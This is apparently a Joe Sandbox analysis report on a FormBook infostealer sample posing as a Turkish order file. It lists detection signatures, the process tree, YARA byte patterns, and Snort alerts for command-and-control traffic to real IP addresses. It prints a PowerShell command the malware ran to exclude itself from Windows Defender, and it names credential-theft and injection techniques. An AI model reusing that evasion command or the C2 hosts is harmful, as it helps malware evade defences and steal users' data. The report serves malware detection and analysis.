Edit tour

Windows Analysis Report
Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe

Overview

General Information

Sample name:	Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe
Analysis ID:	1466644
MD5:	0a4b0ad0f1b172acacb64b09cf6e4277
SHA1:	4d9861a209f9a4f0eae42b5d4290a9f1079fbeb3
SHA256:	6e96f02123bda97a2255ac99a19e72e477237ecfd69755dc042f243affd34af4
Tags:	exegeoTUR
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains potential unpacker

.NET source code contains very large array initializations

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates processes with suspicious names

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe (PID: 7728 cmdline: "C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe" MD5: 0A4B0AD0F1B172ACACB64B09CF6E4277)

powershell.exe (PID: 7904 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe (PID: 7920 cmdline: "C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe" MD5: 0A4B0AD0F1B172ACACB64B09CF6E4277)

UQgCFxrqyzfeJVhlwgINlmFOLs.exe (PID: 6720 cmdline: "C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

unregmp2.exe (PID: 7356 cmdline: "C:\Windows\SysWOW64\unregmp2.exe" MD5: 51629AAAF753C6411D0B7D37620B7A83)

UQgCFxrqyzfeJVhlwgINlmFOLs.exe (PID: 6880 cmdline: "C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 1148 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000B.00000002.3851020084.0000000005020000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000B.00000002.3851020084.0000000005020000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x40b60:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x2a10f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.1608845942.00000000016E0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.1608845942.00000000016E0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2ab40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x140ef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000007.00000002.3845669243.0000000000410000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.3845669243.0000000000410000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2ab40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x140ef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.1607201928.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.1607201928.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2dfc3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17572:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000007.00000002.3848068617.0000000000D70000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.3848068617.0000000000D70000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2ab40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x140ef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000007.00000002.3847970736.0000000000D30000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.3847970736.0000000000D30000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2ab40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x140ef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.1608954398.0000000001720000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.1608954398.0000000001720000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x84b2ec:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x83489b:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.3848399247.0000000002FD0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3848399247.0000000002FD0000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x84b2ec:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x83489b:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Process Memory Space: Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe PID: 7728	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 12 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
5.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2d1c3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16772:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
5.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
5.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2dfc3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17572:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe", ParentImage: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe, ParentProcessId: 7728, ParentProcessName: Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe", ProcessId: 7904, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe", ParentImage: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe, ParentProcessId: 7728, ParentProcessName: Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe", ProcessId: 7904, ProcessName: powershell.exe

Snort Signatures

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.8 - Destination IP: 91.195.240.19

Timestamp:	07/03/24-08:34:30.392510
SID:	2855464
Source Port:	61434
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.8 - Destination IP: 91.195.240.19

Timestamp:	07/03/24-08:34:38.210601
SID:	2855465
Source Port:	61437
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.8 - Destination IP: 203.161.49.220

Timestamp:	07/03/24-08:35:53.290265
SID:	2855464
Source Port:	61451
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.8 - Destination IP: 91.195.240.19

Timestamp:	07/03/24-08:35:17.331293
SID:	2855464
Source Port:	61443
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.8 - Destination IP: 66.235.200.146

Timestamp:	07/03/24-08:37:10.466626
SID:	2855464
Source Port:	61470
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.8 - Destination IP: 109.95.158.122

Timestamp:	07/03/24-08:35:36.240629
SID:	2855464
Source Port:	61446
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.8 - Destination IP: 109.95.158.122

Timestamp:	07/03/24-08:35:44.422597
SID:	2855465
Source Port:	61449
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.8 - Destination IP: 208.91.197.27

Timestamp:	07/03/24-08:36:56.027283
SID:	2855464
Source Port:	61467
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.8 - Destination IP: 47.239.13.172

Timestamp:	07/03/24-08:36:42.274563
SID:	2855464
Source Port:	61463
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.8 - Destination IP: 91.195.240.19

Timestamp:	07/03/24-08:36:17.634122
SID:	2855464
Source Port:	61458
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.8 - Destination IP: 208.91.197.27

Timestamp:	07/03/24-08:37:01.089769
SID:	2855465
Source Port:	61469
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.8 - Destination IP: 103.197.25.241

Timestamp:	07/03/24-08:33:56.148224
SID:	2855464
Source Port:	61430
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.8 - Destination IP: 208.91.197.27

Timestamp:	07/03/24-08:36:53.486013
SID:	2855464
Source Port:	61466
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.8 - Destination IP: 91.195.240.19

Timestamp:	07/03/24-08:34:32.929575
SID:	2855464
Source Port:	61435
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.8 - Destination IP: 47.239.13.172

Timestamp:	07/03/24-08:36:47.337864
SID:	2855465
Source Port:	61465
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.8 - Destination IP: 212.227.172.254

Timestamp:	07/03/24-08:34:54.558535
SID:	2855464
Source Port:	61439
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.8 - Destination IP: 47.239.13.172

Timestamp:	07/03/24-08:36:39.734472
SID:	2855464
Source Port:	61462
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.8 - Destination IP: 103.197.25.241

Timestamp:	07/03/24-08:34:03.758043
SID:	2855465
Source Port:	61433
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.8 - Destination IP: 35.227.248.111

Timestamp:	07/03/24-08:36:06.852665
SID:	2855464
Source Port:	61455
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.8 - Destination IP: 203.161.49.220

Timestamp:	07/03/24-08:35:50.761028
SID:	2855464
Source Port:	61450
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.8 - Destination IP: 91.195.240.19

Timestamp:	07/03/24-08:36:20.164223
SID:	2855464
Source Port:	61459
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.8 - Destination IP: 203.161.49.220

Timestamp:	07/03/24-08:35:58.358637
SID:	2855465
Source Port:	61453
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.8 - Destination IP: 91.195.240.19

Timestamp:	07/03/24-08:36:25.248489
SID:	2855465
Source Port:	61461
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.8 - Destination IP: 91.195.240.19

Timestamp:	07/03/24-08:35:14.452619
SID:	2855464
Source Port:	61442
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.8 - Destination IP: 35.227.248.111

Timestamp:	07/03/24-08:36:04.314574
SID:	2855464
Source Port:	61454
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.8 - Destination IP: 91.195.240.19

Timestamp:	07/03/24-08:35:22.399810
SID:	2855465
Source Port:	61445
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.8 - Destination IP: 23.111.180.146

Timestamp:	07/03/24-08:33:40.563094
SID:	2855465
Source Port:	61426
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.8 - Destination IP: 212.227.172.254

Timestamp:	07/03/24-08:34:52.027029
SID:	2855464
Source Port:	61438
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.8 - Destination IP: 35.227.248.111

Timestamp:	07/03/24-08:36:11.915972
SID:	2855465
Source Port:	61457
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.8 - Destination IP: 103.197.25.241

Timestamp:	07/03/24-08:33:58.690691
SID:	2855464
Source Port:	61431
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.8 - Destination IP: 212.227.172.254

Timestamp:	07/03/24-08:35:00.489221
SID:	2855465
Source Port:	61441
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.8 - Destination IP: 66.235.200.146

Timestamp:	07/03/24-08:37:13.726579
SID:	2855464
Source Port:	61471
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.8 - Destination IP: 109.95.158.122

Timestamp:	07/03/24-08:35:38.778768
SID:	2855464
Source Port:	61447
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Virustotal: Detection: 31%			Perma Link
Source: Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	ReversingLabs: Detection: 21%

Yara detected FormBook

Source: Yara match	File source: 5.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.3851020084.0000000005020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1608845942.00000000016E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3845669243.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1607201928.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3848068617.0000000000D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3847970736.0000000000D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1608954398.0000000001720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3848399247.0000000002FD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe

Joe Sandbox ML: detected

Source: Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: unregmp2.pdb source: Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe, 00000005.00000002.1607512166.0000000000F28000.00000004.00000020.00020000.00000000.sdmp, UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 00000006.00000002.3847213941.0000000001318000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 00000006.00000000.1533882068.00000000004EE000.00000002.00000001.01000000.0000000C.sdmp, UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 0000000B.00000000.1676641682.00000000004EE000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: wntdll.pdbUGP source: Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe, 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, 00000007.00000003.1609720610.0000000004350000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000007.00000003.1607430184.0000000000C1A000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000007.00000002.3848341578.0000000004500000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, 00000007.00000002.3848341578.000000000469E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe, Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe, 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, unregmp2.exe, 00000007.00000003.1609720610.0000000004350000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000007.00000003.1607430184.0000000000C1A000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000007.00000002.3848341578.0000000004500000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, 00000007.00000002.3848341578.000000000469E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: unregmp2.pdbGCTL source: Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe, 00000005.00000002.1607512166.0000000000F28000.00000004.00000020.00020000.00000000.sdmp, UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 00000006.00000002.3847213941.0000000001318000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\unregmp2.exe

Code function: 7_2_0042BE00 FindFirstFileW,FindNextFileW,FindClose,

7_2_0042BE00

Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 4x nop then jmp 06C38733h	0_2_06C37E92
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 4x nop then xor eax, eax	7_2_004197B0
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 4x nop then pop edi	7_2_0041E09E
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 4x nop then mov ebx, 00000004h	7_2_0435053E

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.8:61426 -> 23.111.180.146:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.8:61430 -> 103.197.25.241:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.8:61431 -> 103.197.25.241:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.8:61433 -> 103.197.25.241:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.8:61434 -> 91.195.240.19:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.8:61435 -> 91.195.240.19:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.8:61437 -> 91.195.240.19:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.8:61438 -> 212.227.172.254:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.8:61439 -> 212.227.172.254:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.8:61441 -> 212.227.172.254:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.8:61442 -> 91.195.240.19:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.8:61443 -> 91.195.240.19:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.8:61445 -> 91.195.240.19:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.8:61446 -> 109.95.158.122:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.8:61447 -> 109.95.158.122:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.8:61449 -> 109.95.158.122:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.8:61450 -> 203.161.49.220:80
